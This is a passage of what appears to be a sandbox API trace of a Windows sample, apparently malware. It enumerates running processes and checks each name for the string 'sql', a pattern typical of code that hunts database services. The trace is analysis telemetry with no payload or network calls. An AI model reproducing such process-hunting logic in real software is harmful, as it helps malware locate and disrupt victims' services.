lstrcpyA (in: lpString1=0x567fabc, lpString2="lsass.exe" | out: lpString1="lsass.exe") returned="lsass.exe" [0113.418] StrStrIA (lpFirst="lsass.exe", lpSrch="sql") returned 0x0 [0113.418] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.419] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0113.419] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3570e00 [0113.419] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3570e00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0113.419] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0113.419] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0113.419] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x220, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0113.421] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0113.421] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3570e60 [0113.421] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x3570e60, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0113.421] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0113.421] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="sql") returned 0x0 [0113.421] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0113.422] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0113.422] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3570dd0 [0113.422] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x3570dd0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0113.423] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0113.423] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="sql") returned 0x0 [0113.423] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.424] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0113.424] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3570e30 [0113.424] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3570e30, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0113.424] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0113.424] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0113.424] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x220, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0113.426] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0113.426] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x357e278 [0113.426] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x357e278, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 8 [0113.426] lstrcpyA (in: lpString1=0x567fabc, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0113.427] StrStrIA (lpFirst="dwm.exe", lpSrch="sql") returned 0x0 [0113.427] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x59, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.428] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0113.428] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3570e18 [0113.428] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3570e18, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0113.428] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0113.428] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0113.428] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.429] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0113.429] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3570ea8 [0113.430] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3570ea8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0113.430] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0113.430] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0113.430] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.431] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0113.431] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3570f98 [0113.431] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3570f98, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0113.431] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0113.431] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0113.431] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0113.433] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3570f20 [0113.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3570f20, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0113.433] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0113.433] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0113.433] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x350, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.435] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0113.435] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3571040 [0113.435] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3571040, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0113.435] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0113.435] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0113.435] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x434, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.436] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0113.436] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3570de8 [0113.436] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3570de8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0113.436] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0113.436] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0113.436] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x554, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.438] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0113.438] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3570e78 [0113.438] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3570e78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0113.438] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0113.438] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0113.438] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.439] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0113.439] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3570f38 [0113.439] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3570f38, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0113.439] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0113.439] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0113.440] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.507] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0113.507] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3570f68 [0113.507] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3570f68, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0113.507] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0113.507] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0113.507] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.509] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0113.509] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3570f50 [0113.509] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3570f50, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0113.509] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0113.509] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0113.509] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0113.510] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0113.510] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3570ec0 [0113.510] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x3570ec0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 12 [0113.511] lstrcpyA (in: lpString1=0x567fabc, lpString2="spoolsv.exe" | out: lpString1="spoolsv.exe") returned="spoolsv.exe" [0113.511] StrStrIA (lpFirst="spoolsv.exe", lpSrch="sql") returned 0x0 [0113.511] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.512] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0113.512] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3570ed8 [0113.512] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3570ed8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0113.512] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0113.512] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0113.512] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x554, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0113.514] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0113.514] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3570e48 [0113.514] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x3570e48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 12 [0113.514] lstrcpyA (in: lpString1=0x567fabc, lpString2="audiodg.exe" | out: lpString1="audiodg.exe") returned="audiodg.exe" [0113.514] StrStrIA (lpFirst="audiodg.exe", lpSrch="sql") returned 0x0 [0113.514] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x708, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0113.515] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0113.515] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3570f08 [0113.515] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x3570f08, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 11 [0113.515] lstrcpyA (in: lpString1=0x567fabc, lpString2="sihost.exe" | out: lpString1="sihost.exe") returned="sihost.exe" [0113.515] StrStrIA (lpFirst="sihost.exe", lpSrch="sql") returned 0x0 [0113.516] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.517] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0113.517] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3570f80 [0113.517] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3570f80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0113.517] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0113.517] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0113.517] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0113.795] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0113.795] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3570d40 [0113.795] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x3570d40, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0113.795] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0113.795] StrStrIA (lpFirst="taskhostw.exe", lpSrch="sql") returned 0x0 [0113.795] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3e, th32ParentProcessID=0x568, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0113.797] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0113.797] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3570aa0 [0113.797] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x3570aa0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 13 [0113.797] lstrcpyA (in: lpString1=0x567fabc, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0113.797] StrStrIA (lpFirst="explorer.exe", lpSrch="sql") returned 0x0 [0113.797] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0113.799] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0113.799] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357faa0 [0113.799] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x357faa0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 21 [0113.799] lstrcpyA (in: lpString1=0x567fabc, lpString2="OfficeClickToRun.exe" | out: lpString1="OfficeClickToRun.exe") returned="OfficeClickToRun.exe" [0113.799] StrStrIA (lpFirst="OfficeClickToRun.exe", lpSrch="sql") returned 0x0 [0113.799] Process32NextW (in: 